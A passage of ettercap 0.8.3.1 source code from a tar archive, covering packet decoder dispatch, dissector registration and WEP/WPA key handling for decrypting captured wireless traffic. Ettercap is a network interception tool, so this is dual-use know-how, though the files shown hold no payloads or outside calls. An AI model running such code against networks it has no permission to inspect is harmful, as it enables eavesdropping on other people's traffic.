(it can be handled), * this decoder is invoked */ FUNC_DECODER(decode_data) { int proto = 0; FUNC_DECODER_PTR(app_decoder); CANCELLATION_POINT(); /* this packet must not be passet to dissectors */ if ( po->flags & PO_DONT_DISSECT) return NULL; /* reset the flag PO_IGNORE if the packet should be processed */ EXECUTE(EC_GBL_SNIFF->interesting, po); /* HOOK POINT: HANDLED */ hook_point(HOOK_HANDLED, po); /* * the display engine has stated that this * packet should not be processed by us. */ if ( po->flags & PO_IGNORE ) return NULL; /* * run the APP_LAYER decoders * * we should run the decoder on both the tcp/udp ports * since we may be interested in both client and server traffic. */ switch(po->L4.proto) { case NL_TYPE_TCP: proto = APP_LAYER_TCP; break; case NL_TYPE_UDP: proto = APP_LAYER_UDP; break; } if(proto) { app_decoder = get_decoder(proto, ntohs(po->L4.src)); EXECUTE_DECODER(app_decoder); /* * This check prevents from running a decoder twice */ if(po->L4.src != po->L4.dst) { app_decoder = get_decoder(proto, ntohs(po->L4.dst)); EXECUTE_DECODER(app_decoder); } } /* HOOK POINT: DECODED (the po structure is filled) */ hook_point(HOOK_DECODED, po); /* * here we can filter the content of the packet. * the injection is done elsewhere. */ filter_packet(po); /* If the modified packet exceeds the MTU split it into inject buffer */ inject_split_data(po); /* HOOK POINT: FILTER */ hook_point(HOOK_FILTER, po); /* * add the packet to the queue and return. * we must be fast here ! */ top_half_queue_add(po); CANCELLATION_POINT(); return NULL; } /* * add a decoder to the decoders table */ void add_decoder(u_int8 level, u_int32 type, FUNC_DECODER_PTR(decoder)) { struct dec_entry *e; bool found = false; DECODERS_LOCK; /* in case this is the first call and no tables are allocated */ if(protocols_table == NULL) { /* the numbers are kindly provided by /usr/bin/grep and /usr/bin/wc */ SAFE_CALLOC(protocols_table, protocols_num = 19 + 52, sizeof(struct dec_entry)); } e = &protocols_table[protocols_num]; /* searching for an empty entry */ while(e --> protocols_table) if(e->level == 0 && e->type == 0 && e->decoder == NULL) { /* We got it! */ found = true; break; } /* * wc and grep are a part of The Conspiracy! * but we can allocate a little bit more, cant we? * and no kidding plz, its a serious code from now on */ if(!found) { SAFE_REALLOC(protocols_table, ++protocols_num * sizeof(struct dec_entry)); e = &protocols_table[protocols_num - 1]; } /* We win, they lose, ha-ha! */ e->level = level; e->type = type; e->decoder = decoder; e->active = true; table_sorted = false; DECODERS_UNLOCK; return; } /* * this is to be called in the initialization end * after all of the protocols are added */ static void sort_decoders(void) { qsort(protocols_table, protocols_num, sizeof(struct dec_entry), cmp_decoders); table_sorted = true; } static int cmp_decoders(const void *va, const void *vb) { const struct dec_entry *da = va, *db = vb; /* Here is the tricky part: * the array is sorted by level, then by the port number. */ if (da->level != db->level) { return da->level - db->level; } return da->type - db->type; } static struct dec_entry* find_entry(u_int8 level, u_int32 type) { struct dec_entry *e, fake; fake.level = level; fake.type = type; DECODERS_LOCK; if(!table_sorted) sort_decoders(); e = bsearch(&fake, protocols_table, protocols_num, sizeof(struct dec_entry), cmp_decoders); DECODERS_UNLOCK; return e; } /* * get a decoder from the decoders table */ void * get_decoder(u_int8 level, u_int32 type) { struct dec_entry *e; if((e = find_entry(level, type))) if(e->active) return e->decoder; return NULL; } /* * remove a decoder(s) from the decoders table */ void del_decoder(u_int8 level, u_int32 type) { struct dec_entry *e; if((e = find_entry(level, type))) { DECODERS_LOCK; if (e != &protocols_table[protocols_num-1]) { /* Replace this entry with the last one */ memcpy(e, &protocols_table[protocols_num-1], sizeof(struct dec_entry)); } /* Resize the array */ SAFE_REALLOC(protocols_table, --protocols_num*sizeof(struct dec_entry)); /* And mark as unsorted */ table_sorted = false; DECODERS_UNLOCK; } return; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_dispatcher.c000664 000000 000000 00000011056 13711276346 017215 0ustar00rootroot000000 000000 /* ettercap -- top half and dispatching module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* this is the PO queue from bottom to top half */ struct po_queue_entry { struct packet_object *po; STAILQ_ENTRY(po_queue_entry) next; }; static STAILQ_HEAD(, po_queue_entry) po_queue = STAILQ_HEAD_INITIALIZER(po_queue); /* global mutex on interface */ static pthread_mutex_t po_mutex = PTHREAD_MUTEX_INITIALIZER; #define PO_QUEUE_LOCK do{ pthread_mutex_lock(&po_mutex); }while(0) #define PO_QUEUE_UNLOCK do{ pthread_mutex_unlock(&po_mutex); }while(0) /* proto */ void top_half_queue_add(struct packet_object *po); EC_THREAD_FUNC(top_half); /*******************************************/ /* * top half function * it is the dispatcher for the various methods * which need to process packet objects * created by the bottom_half (capture). * it read the queue created by top_half_queue_add() * and deliver the po to all the registered functions */ EC_THREAD_FUNC(top_half) { struct po_queue_entry *e; u_int pck_len; /* variable not used */ (void) EC_THREAD_PARAM; /* initialize the thread */ ec_thread_init(); DEBUG_MSG("top_half activated !"); /* * we don't want profiles in memory. * remove the hooks and return */ if (!EC_GBL_CONF->store_profiles) { DEBUG_MSG("top_half: profile collection disabled"); hook_del(HOOK_PACKET_ARP, &profile_parse); hook_del(HOOK_PACKET_ICMP, &profile_parse); hook_del(HOOK_PROTO_DHCP_PROFILE, &profile_parse); hook_del(HOOK_DISPATCHER, &profile_parse); } LOOP { CANCELLATION_POINT(); /* the queue is updated by other thread, lock it */ PO_QUEUE_LOCK; /* get the first element */ e = STAILQ_FIRST(&po_queue); /* the queue is empty, nothing to do... */ if (e == NULL) { PO_QUEUE_UNLOCK; ec_usleep(1); // 1µs continue; } /* start the counter for the TopHalf */ stats_half_start(&EC_GBL_STATS->th); /* remove the packet form the queue */ STAILQ_REMOVE_HEAD(&po_queue, e, next); /* update the queue stats */ stats_queue_del(); /* * we have extracted the element, unlock the queue * * the bottom half MUST be very fast and it cannot * wait on the top half lock. */ PO_QUEUE_UNLOCK; /* * check if it is the last packet of a file... * and exit if we are in text only or demonize mode */ if (e->po->flags & PO_EOF) { DEBUG_MSG("End of dump file..."); USER_MSG("\nEnd of dump file...\n"); if ((EC_GBL_UI->type == UI_TEXT || EC_GBL_UI->type == UI_DAEMONIZE) && EC_GBL_CONF->close_on_eof) clean_exit(0); else { SAFE_FREE(e); continue; } } /* HOOK_POINT: DISPATCHER */ hook_point(HOOK_DISPATCHER, e->po); /* save the len before the free() */ pck_len = e->po->DATA.disp_len; /* destroy the duplicate packet object */ packet_destroy_object(e->po); SAFE_FREE(e->po); SAFE_FREE(e); /* start the counter for the TopHalf */ stats_half_end(&EC_GBL_STATS->th, pck_len); } return NULL; } /* * add a packet to the top half queue. * this fuction is called by the bottom half thread */ void top_half_queue_add(struct packet_object *po) { struct po_queue_entry *e; SAFE_CALLOC(e, 1, sizeof(struct po_queue_entry)); e->po = packet_dup(po, PO_DUP_NONE); PO_QUEUE_LOCK; /* add the message to the queue */ STAILQ_INSERT_TAIL(&po_queue, e, next); /* update the stats */ stats_queue_add(); PO_QUEUE_UNLOCK; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_dissect.c000664 000000 000000 00000016421 13711276346 016526 0ustar00rootroot000000 000000 /* ettercap -- dissector module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ static SLIST_HEAD (, dissect_entry) dissect_list; struct dissect_entry { char *name; u_int32 type; u_int8 level; FUNC_DECODER_PTR(decoder); SLIST_ENTRY (dissect_entry) next; }; /*******************************************/ /* * compare two session ident * * return 1 if it matches */ int dissect_match(void *id_sess, void *id_curr) { struct dissect_ident *ids = id_sess; struct dissect_ident *id = id_curr; /* sanity check */ BUG_IF(ids == NULL); BUG_IF(id == NULL); /* * is this ident from our level ? * check the magic ! */ if (ids->magic != id->magic) return 0; /* check the protocol */ if (ids->L4_proto != id->L4_proto) return 0; /* from source to dest */ if (ids->L4_src == id->L4_src && ids->L4_dst == id->L4_dst && !ip_addr_cmp(&ids->L3_src, &id->L3_src) && !ip_addr_cmp(&ids->L3_dst, &id->L3_dst) ) return 1; /* from dest to source */ if (ids->L4_src == id->L4_dst && ids->L4_dst == id->L4_src && !ip_addr_cmp(&ids->L3_src, &id->L3_dst) && !ip_addr_cmp(&ids->L3_dst, &id->L3_src) ) return 1; return 0; } /* * prepare the ident and the pointer to match function * for a dissector. */ void dissect_create_session(struct ec_session **s, struct packet_object *po, void *code) { void *ident; DEBUG_MSG("dissect_create_session"); /* allocate the session */ SAFE_CALLOC(*s, 1, sizeof(struct ec_session)); /* create the ident */ (*s)->ident_len = dissect_create_ident(&ident, po, code); /* link to the session */ (*s)->ident = ident; /* the matching function */ (*s)->match = &dissect_match; } /* * create the ident for a session */ size_t dissect_create_ident(void **i, struct packet_object *po, void *code) { struct dissect_ident *ident; /* allocate the ident for that session */ SAFE_CALLOC(ident, 1, sizeof(struct dissect_ident)); /* the magic number (usually the pointer for the function) */ ident->fptr = code; /* prepare the ident */ memcpy(&ident->L3_src, &po->L3.src, sizeof(struct ip_addr)); memcpy(&ident->L3_dst, &po->L3.dst, sizeof(struct ip_addr)); ident->L4_proto = po->L4.proto; ident->L4_src = po->L4.src; ident->L4_dst = po->L4.dst; /* return the ident */ *i = ident; /* return the length of the ident */ return sizeof(struct dissect_ident); } /* * totally destroy the session bound to this connection */ void dissect_wipe_session(struct packet_object *po, void *code) { void *ident; struct ec_session *s; DEBUG_MSG("dissect_wipe_session"); /* create an ident to retrieve the session */ dissect_create_ident(&ident, po, code); /* retrieve the session and delete it */ if (session_get_and_del(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return; } /* free the session */ session_free(s); SAFE_FREE(ident); } /* * register a dissector in the dissectors list * and add it to the decoder list. * this list is used by dissect_modify during the parsing * of etter.conf to enable/disable the dissectors via their name. */ void dissect_add(char *name, u_int8 level, u_int32 port, FUNC_DECODER_PTR(decoder)) { struct dissect_entry *e; SAFE_CALLOC(e, 1, sizeof(struct dissect_entry)); e->name = strdup(name); e->level = level; e->type = port; e->decoder = decoder; SLIST_INSERT_HEAD (&dissect_list, e, next); /* add the default decoder */ add_decoder(level, port, decoder); return; } /* * remove all istances of a dissector in the dissectors list */ void dissect_del(char *name) { struct dissect_entry *e, *tmp = NULL; SLIST_FOREACH_SAFE(e, &dissect_list, next, tmp) { if (!strcasecmp(e->name, name)) { del_decoder(e->level, e->type); SLIST_REMOVE(&dissect_list, e, dissect_entry, next); SAFE_FREE(e); } } return; } /* * given the name of the dissector add or remove it * from the decoders' table. * is it possible to add multiple port with MODE_ADD */ int dissect_modify(int mode, char *name, u_int32 port) { struct dissect_entry *e; int level; void *decoder; SLIST_FOREACH (e, &dissect_list, next) { if (!strcasecmp(e->name, name)) { switch (mode) { case MODE_ADD: DEBUG_MSG("dissect_modify: %s added on %lu", name, (unsigned long)port); /* add in the lists */ dissect_add(e->name, e->level, port, e->decoder); return E_SUCCESS; break; case MODE_REP: /* save them because the dissect_del may delete this values */ level = e->level; decoder = e->decoder; /* remove all the previous istances */ dissect_del(name); /* move the ssl wrapper (even if no wrapper) */ sslw_dissect_move(name, port); /* a value of 0 will disable the dissector */ if (port == 0) { DEBUG_MSG("dissect_modify: %s disabled", name); return E_SUCCESS; } DEBUG_MSG("dissect_modify: %s replaced to %lu", name, (unsigned long)port); /* add the new value */ dissect_add(name, level, port, decoder); return E_SUCCESS; break; } } } return -E_NOTFOUND; } /* * return E_SUCCESS if the dissector is on * the specified port */ int dissect_on_port(char *name, u_int16 port) { struct dissect_entry *e; /* * return E_SUCCESS if at least one port is bound * to the dissector name */ SLIST_FOREACH (e, &dissect_list, next) { if (!strcasecmp(e->name, name) && e->type == port) { return E_SUCCESS; } } return -E_NOTFOUND; } /* * return E_SUCCESS if the dissector is on * the specified port of the specified protocol (TCP or UDP) */ int dissect_on_port_level(char *name, u_int16 port, u_int8 level) { struct dissect_entry *e; /* * return E_SUCCESS if at least one port is bound * to the dissector name */ SLIST_FOREACH (e, &dissect_list, next) { if (!strcasecmp(e->name, name) && e->type == port && e->level == level) { return E_SUCCESS; } } return -E_NOTFOUND; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_encryption.c000664 000000 000000 00000044274 13711276346 017271 0ustar00rootroot000000 000000 /* ettercap -- encryption functions Copyright (C) The Ettercap Dev Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include /* globals */ static LIST_HEAD(, wpa_session) wpa_sess_root; static pthread_mutex_t root_mutex = PTHREAD_MUTEX_INITIALIZER; /* protos */ static int set_wep_key(char *string); static void make_key_64(u_char *string, u_char *key); static void make_key_128(u_char *string, u_char *key); static int set_wpa_key(char *string); extern int wpa_ccmp_decrypt(u_char *mac, u_char *data, size_t len, struct wpa_sa sa); extern int wpa_tkip_decrypt(u_char *mac, u_char *data, size_t len, struct wpa_sa sa); /*******************************************/ /* * WEP decrypt function */ int wep_decrypt(u_char *buf, size_t len, u_char *wkey, size_t wlen) { RC4_KEY key; u_char seed[32]; /* 256 bit for the wep key */ struct wep_header *wep; u_char *encbuf; u_char decbuf[len]; /* the key was not set, don't try to decript it */ if (wlen == 0) return -E_NOTHANDLED; /* get the wep header */ wep = (struct wep_header *)buf; len -= sizeof(struct wep_header); /* get the key index */ wep->key >>= 6; /* sanity check on the key index */ if (wep->key * 5 > (int)(MAX_WKEY_LEN - wlen)) { //DEBUG_MSG(D_VERBOSE, "WEP: invalid key index, the packet was skipped"); return -E_NOTHANDLED; } encbuf = (u_char *)(wep + 1); /* copy the IV in the first 24 bit of the RC4 seed */ memcpy(seed, wep->init_vector, WEP_IV_LEN); /* * complete the seed with x bit from the secret key * * when using 64 bit WEP, the four keys are stored * in the wkey array, every 5 bytes there is a new * key, so we can indicize them with wep->key * 5 */ memcpy(seed + WEP_IV_LEN, &wkey[wep->key * 5], wlen); /* initialize the RC4 key */ RC4_set_key(&key, WEP_IV_LEN + wlen, seed); /* decrypt the frame (len + 4 byte of crc) */ RC4(&key, len + WEP_CRC_LEN, encbuf, decbuf); /* * check if the decryption was successful: * at the end of the packet there is a CRC check */ if (CRC_checksum(decbuf, len + WEP_CRC_LEN, CRC_INIT) != CRC_RESULT) { //DEBUG_MSG(D_VERBOSE, "WEP decryption failed, the packet was skipped"); return -E_NOTHANDLED; } /* * copy the decrypted packet over the original one * overwriting the wep header. this way the packet is * identical to a non-WEP one. */ memcpy(buf, decbuf, len); /* * wipe out the remaining bytes at the end of the packets * we have moved the data over the wep header and the crc was left * at the end of the packet. */ memset(buf + len, 0, WEP_CRC_LEN); return E_SUCCESS; } /* * parse the string provided by the user and set the internally used buffer * the format is: * type:bits:t:string * where: * type: can be wep, wpa-psw, wpa-psk * bits: is the number of bits used for the key * t: can be: * s: for strings (or hexadecimal escaped values) * p: for passwords that will be used to generate the key * for example: * wep:64:p:ciao * wep:64:s:alor1 * wep:128:s:rcsredirect12 * wep:64:s:\x01\x02\x03\x04\x05 * wpa:pwd:password:ssid * wpa:psk:663eb260e87cf389c6bd7331b28d82f5203b0cae4e315f9cbb7602f3236708a6 */ int wifi_key_prepare(char *key_string) { int status = -E_INVALID; char *ks; char *p; if (key_string == NULL) return -E_INVALID; ks = strdup(key_string); if ((p = strchr(ks, ':')) != NULL) *p = 0; /* the following string is a definition for WEP */ if (!strcasecmp(ks, "wep")) { EC_GBL_WIFI->wifi_schema = WIFI_WEP; status = set_wep_key(p + 1); } /* the following string is a definition for WPA */ if (!strcasecmp(ks, "wpa")) { EC_GBL_WIFI->wifi_schema = WIFI_WPA; status = set_wpa_key(p + 1); } SAFE_FREE(ks); return status; } int set_wep_key(char *string) { int bit = 0; char *p, type; char *tok; char s[strlen(string) + 1]; u_char tmp_wkey[512]; size_t tmp_wkey_len; char tmp[128]; memset(EC_GBL_WIFI->wkey, 0, sizeof(EC_GBL_WIFI->wkey)); EC_GBL_WIFI->wkey_len = 0; strcpy(s, string); p = ec_strtok(s, ":", &tok); if (p == NULL) SEMIFATAL_ERROR("Invalid parsing of the WEP key"); bit = atoi(p); /* sanity check */ if (bit <= 0) SEMIFATAL_ERROR("Unsupported WEP key length"); /* the len of the secret part of the RC4 seed */ tmp_wkey_len = bit / 8 - WEP_IV_LEN; /* sanity check */ if (bit != 64 && bit != 128) SEMIFATAL_ERROR("Unsupported WEP key length"); /* get the type of the key */ p = ec_strtok(NULL, ":", &tok); if (p == NULL) SEMIFATAL_ERROR("Invalid parsing of the WEP key"); type = *p; /* get the third part of the string */ p = ec_strtok(NULL, ":", &tok); if (p == NULL) SEMIFATAL_ERROR("Invalid parsing of the WEP key"); if (type == 's') { /* escape the string and check its length */ if (strescape((char *)tmp_wkey, p, strlen(tmp_wkey)+1) != (int)tmp_wkey_len) SEMIFATAL_ERROR("Specified WEP key length does not match the given string"); } else if (type == 'p') { /* create the key from the passphrase */ if (bit == 64) make_key_64((u_char *)p, tmp_wkey); else if (bit == 128) make_key_128((u_char *)p, tmp_wkey); } else { SEMIFATAL_ERROR("Invalid parsing of the WEP key"); } /* print the final string */ USER_MSG("Using WEP key: %s\n", str_tohex(tmp_wkey, tmp_wkey_len, tmp, sizeof(tmp))); memcpy(EC_GBL_WIFI->wkey, tmp_wkey, sizeof(EC_GBL_WIFI->wkey)); EC_GBL_WIFI->wkey_len = tmp_wkey_len; return E_SUCCESS; } /* * generate a key set (4 keys) from a passfrase */ static void make_key_64(u_char *string, u_char *key) { int i, seed = 0; /* * seed is generated by xor'ing the keystring bytes * into the four bytes of the seed, starting at the little end */ for(i = 0; string[i]; i++) { seed ^= (string[i] << ((i & 0x03) * 8)); } /* generate the 4 keys from the seed */ for(i = 0; i < 5*4; i++) { seed *= 0x000343fd; seed += 0x00269ec3; key[i] = seed >> 16; } } static void make_key_128(u_char *string, u_char *key) { MD5_CTX ctx; u_char buf[64]; u_char digest[MD5_DIGEST_LENGTH]; int i, j = 0; /* repeat the string until buf is full */ for (i = 0; i < 64; i++) { if(string[j] == 0) j = 0; buf[i] = string[j++]; } /* compute the md5 digest of the buffer */ MD5_Init(&ctx); MD5_Update(&ctx, buf, sizeof buf); MD5_Final(digest, &ctx); /* * copy the digest into the key * 13 byte == 104 bit */ memset(key, 0, MAX_WKEY_LEN); memcpy(key, digest, 13); } static int set_wpa_key(char *string) { char *p; char *pass; char *ssid; char tmp[128]; int i; /* we need to generate the key */ if (!strncasecmp(string, "pwd", 3)) { if ((p = strchr(string + + strlen("pwd") + 1, ':')) != NULL) { *p = 0; } else { SEMIFATAL_ERROR("Invalid parsing of the WPA password (missing SSID)"); } /* the len of the password */ i = strlen(string + strlen("pwd") + 1); /* sanity check */ if (i < 8 || i > 63) { SEMIFATAL_ERROR("Invalid parsing of the WPA-PWD password (must be 8..63 chars)"); } SAFE_STRDUP(pass, string + strlen("pwd") + 1); SAFE_STRDUP(ssid, p + 1); /* * undocumented function from OPENSSL which implement the PBKDF2 function used to generate the passphrase * the 4096 number of iterations was taken from wpa_passphrase.c of wpa_supplicant package */ PKCS5_PBKDF2_HMAC_SHA1(pass, strlen(pass), (u_char *)ssid, strlen(ssid), 4096, 32, EC_GBL_WIFI->wkey); SAFE_FREE(pass); SAFE_FREE(ssid); } /* just take the key and store it */ if (!strncasecmp(string, "psk", 3)) { /* the hex string should be 32 bytes in hex format */ if (strlen(string + strlen("psk") + 1) != 64) { SEMIFATAL_ERROR("Invalid parsing of the WPA-PSK password (must be 64 chars)"); } /* parse the hex string into bytes */ str_hex_to_bytes(string + strlen("psk") + 1, EC_GBL_WIFI->wkey); } /* print the final string */ USER_MSG("Using WPA key: %s\n", str_tohex(EC_GBL_WIFI->wkey, WPA_KEY_LEN, tmp, sizeof(tmp))); return E_SUCCESS; } void wpa_sess_add(u_char *sta, struct wpa_sa *sa) { struct wpa_session *e, *s; char tmp[MAX_ASCII_ADDR_LEN]; /* alloc the new element */ SAFE_CALLOC(e, 1, sizeof(struct wpa_session)); if (sta) memcpy(&e->sta, sta, ETH_ADDR_LEN); if (sa) { /* get the time of the creation. * this will be used to timeout the entry if we miss some packets * to prevent inconsistent state forever */ gettimeofday(&sa->tv, NULL); memcpy(&e->sa, sa, sizeof(struct wpa_sa)); } /* insert it in the list */ pthread_mutex_lock(&root_mutex); /* check if the session already exists */ LIST_FOREACH(s, &wpa_sess_root, next) { if (!memcmp(&e->sta, &s->sta, ETH_ADDR_LEN)) { /* already present in the list, replace the SA */ if (sa) { memcpy(&s->sa, sa, sizeof(struct wpa_sa)); /* update the time value */ gettimeofday(&s->sa.tv, NULL); } USER_MSG("WPA session updated for [%s]\n", mac_addr_ntoa(e->sta, tmp)); pthread_mutex_unlock(&root_mutex); return; } } LIST_INSERT_HEAD(&wpa_sess_root, e, next); pthread_mutex_unlock(&root_mutex); USER_MSG("New WPA session for [%s]\n", mac_addr_ntoa(e->sta, tmp)); } void wpa_sess_del(u_char *sta) { struct wpa_session *e, *tmp; char tmac[MAX_ASCII_ADDR_LEN]; pthread_mutex_lock(&root_mutex); LIST_FOREACH_SAFE(e, &wpa_sess_root, next, tmp) { if (!memcmp(&e->sta, sta, ETH_ADDR_LEN)) { LIST_REMOVE(e, next); USER_MSG("WPA session deleted for [%s]\n", mac_addr_ntoa(e->sta, tmac)); SAFE_FREE(e); break; } } pthread_mutex_unlock(&root_mutex); } int wpa_sess_get(u_char *sta, struct wpa_sa *sa) { struct wpa_session *e; pthread_mutex_lock(&root_mutex); LIST_FOREACH(e, &wpa_sess_root, next) { if (!memcmp(&e->sta, sta, ETH_ADDR_LEN)) { memcpy(sa, &e->sa, sizeof(struct wpa_sa)); pthread_mutex_unlock(&root_mutex); return E_SUCCESS; } } pthread_mutex_unlock(&root_mutex); return -E_NOTFOUND; } /* Function used to derive the PTK. Refer to IEEE 802.11I-2004, 8.5.1 */ /* derive the PTK from the BSSID, STA MAC, PMK (WPA-PSK), SNonce, ANonce */ int wpa_generate_PTK(u_char *bssid, u_char *sta, u_char *pmk, u_char *snonce, u_char *anonce, u_int16 bits, u_char *kck) { u_int8 i; u_int len; u_char buff[100]; size_t offset = sizeof("Pairwise key expansion"); memset(buff, 0, 100); /* initialize the buffer */ memcpy(buff, "Pairwise key expansion", offset); /* Min(AA, SPA) || Max(AA, SPA) */ if (memcmp(sta, bssid, ETH_ADDR_LEN) < 0) { memcpy(buff + offset, sta, ETH_ADDR_LEN); memcpy(buff + offset + ETH_ADDR_LEN, bssid, ETH_ADDR_LEN); } else { memcpy(buff + offset, bssid, ETH_ADDR_LEN); memcpy(buff + offset + ETH_ADDR_LEN, sta, ETH_ADDR_LEN); } /* move after AA SPA */ offset += ETH_ADDR_LEN * 2; /* Min(ANonce,SNonce) || Max(ANonce,SNonce) */ if (memcmp(snonce, anonce, WPA_NONCE_LEN) < 0 ) { memcpy(buff + offset, snonce, WPA_NONCE_LEN); memcpy(buff + offset + WPA_NONCE_LEN, anonce, WPA_NONCE_LEN); } else { memcpy(buff + offset, anonce, WPA_NONCE_LEN); memcpy(buff + offset + WPA_NONCE_LEN, snonce, WPA_NONCE_LEN); } /* move after ANonce SNonce */ offset += WPA_NONCE_LEN * 2; memset(kck, 0, WPA_PTK_LEN); /* generate the PTK */ for (i = 0; i < (bits + 159)/160; i++) { buff[offset] = i; /* the buffer (ptk) is large enough (see declaration) */ HMAC(EVP_sha1(), pmk, WPA_KEY_LEN, buff, 100, kck + i * 20, &len); } return E_SUCCESS; } int wpa_check_MIC(struct eapol_header *eapol, struct eapol_key_header* eapol_key, size_t eapol_len, u_char *kck, int algo) { u_char mic[WPA_MICKEY_LEN]; u_int len; u_char hmac_mic[20]; /* MIC 16 byte, the HMAC-SHA1 use a buffer of 20 bytes */ /* copy the MIC from the EAPOL packet */ memcpy(mic, eapol_key->key_MIC, WPA_MICKEY_LEN); /* set to 0 the MIC in the EAPOL packet (to calculate the MIC) */ memset(eapol_key->key_MIC, 0, WPA_MICKEY_LEN); if (algo == WPA_KEY_TKIP) { /* use HMAC-MD5 for the EAPOL-Key MIC */ HMAC(EVP_md5(), kck, WPA_KCK_LEN, (u_char *)eapol, eapol_len, hmac_mic, &len); } else if (algo == WPA_KEY_CCMP) { /* use HMAC-SHA1-128 for the EAPOL-Key MIC */ HMAC(EVP_sha1(), kck, WPA_KCK_LEN, (u_char *)eapol, eapol_len, hmac_mic, &len); } else /* key descriptor version not recognized */ return -E_INVALID; /* restore the MIC in the EAPOL packet */ memcpy(eapol_key->key_MIC, mic, WPA_MICKEY_LEN); /* compare calculated MIC with the Key MIC and return result (0 means success) */ return memcmp(mic, hmac_mic, WPA_MICKEY_LEN); } int wpa_decrypt_broadcast_key(struct eapol_key_header *eapol_key, struct rsn_ie_header *rsn_ie, struct wpa_sa *sa) { //guint8 new_key[32]; u_int8 *encrypted_key; u_int16 key_len = 0; //static AIRPDCAP_KEY_ITEM dummy_key; /* needed in case AirPDcapRsnaMng() wants the key structure */ char tmp[512]; /* variable not used */ (void) rsn_ie; /* Preparation for decrypting the group key - determine group key data length */ /* depending on whether it's a TKIP or AES encryption key */ if (sa->algo == WPA_KEY_TKIP) { key_len = ntohs(eapol_key->key_len); } else if (sa->algo == WPA_KEY_CCMP){ key_len = ntohs(eapol_key->key_data_len); } /* sanity check */ if (key_len > sizeof(struct rsn_ie_header) || key_len == 0) return -E_NOTHANDLED; /* Encrypted key is in the information element field of the EAPOL key packet */ SAFE_CALLOC(encrypted_key, key_len, sizeof(u_int8)); DEBUG_MSG("Encrypted Broadcast key: %s\n", str_tohex(encrypted_key, key_len, tmp, sizeof(tmp))); DEBUG_MSG("KeyIV: %s\n", str_tohex(eapol_key->key_IV, 16, tmp, sizeof(tmp))); DEBUG_MSG("decryption_key: %s\n", str_tohex(sa->ptk + 16, 16, tmp, sizeof(tmp))); /* * XXX - implement broadcast key * we don't really need it, it is used only for multicast and broadcast packets */ #if 0 /* Build the full decryption key based on the IV and part of the pairwise key */ memcpy(new_key, pEAPKey->key_iv, 16); memcpy(new_key+16, decryption_key, 16); DEBUG_DUMP("FullDecrKey:", new_key, 32); if (key_version == AIRPDCAP_WPA_KEY_VER_NOT_CCMP){ guint8 dummy[256]; /* TKIP key */ /* Per 802.11i, Draft 3.0 spec, section 8.5.2, p. 97, line 4-8, */ /* group key is decrypted using RC4. Concatenate the IV with the 16 byte EK (PTK+16) to get the decryption key */ rc4_state_struct rc4_state; crypt_rc4_init(&rc4_state, new_key, sizeof(new_key)); /* Do dummy 256 iterations of the RC4 algorithm (per 802.11i, Draft 3.0, p. 97 line 6) */ crypt_rc4(&rc4_state, dummy, 256); crypt_rc4(&rc4_state, encrypted_key, key_len); } else if (key_version == AIRPDCAP_WPA_KEY_VER_AES_CCMP){ /* AES CCMP key */ guint8 key_found; guint16 key_index; guint8 *decrypted_data; /* This storage is needed for the AES_unwrap function */ decrypted_data = (guint8 *) g_malloc(key_len); AES_unwrap(decryption_key, 16, encrypted_key, key_len, decrypted_data); /* With WPA2 what we get after Broadcast Key decryption is an actual RSN structure. The key itself is stored as a GTK KDE WPA2 IE (1 byte) id = 0xdd, length (1 byte), GTK OUI (4 bytes), key index (1 byte) and 1 reserved byte. Thus we have to pass pointer to the actual key with 8 bytes offset */ key_found = FALSE; key_index = 0; while(key_index < key_len && !key_found){ guint8 rsn_id; /* Get RSN ID */ rsn_id = decrypted_data[key_index]; if (rsn_id != 0xdd){ key_index += decrypted_data[key_index+1]+2; }else{ key_found = TRUE; } } if (key_found){ /* Skip over the GTK header info, and don't copy past the end of the encrypted data */ memcpy(encrypted_key, decrypted_data+key_index+8, key_len-key_index-8); } g_free(decrypted_data); } /* Decrypted key is now in szEncryptedKey with len of key_len */ DEBUG_DUMP("Broadcast key:", encrypted_key, key_len); /* Load the proper key material info into the SA */ sa->key = &dummy_key; sa->validKey = TRUE; sa->wpa.key_ver = key_version; memset(sa->wpa.ptk, 0, sizeof(sa->wpa.ptk)); memcpy(sa->wpa.ptk+32, szEncryptedKey, key_len); g_free(szEncryptedKey); #endif SAFE_FREE(encrypted_key); return E_SUCCESS; } int wpa_decrypt(u_char *mac, u_char *data, size_t len, struct wpa_sa sa) { /* * TKIP - for wpa * CCMP - for wpa2 */ if (sa.algo == WPA_KEY_CCMP) { return wpa_ccmp_decrypt(mac, data, len, sa); } else if (sa.algo == WPA_KEY_TKIP) { return wpa_tkip_decrypt(mac, data, len, sa); } /* not reached */ return -E_NOTHANDLED; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_encryption_ccmp.c000664 000000 000000 00000013673 13711276346 020272 0ustar00rootroot000000 000000 /* ettercap -- encryption functions Copyright (C) The Ettercap Dev Team This program is free software; you can 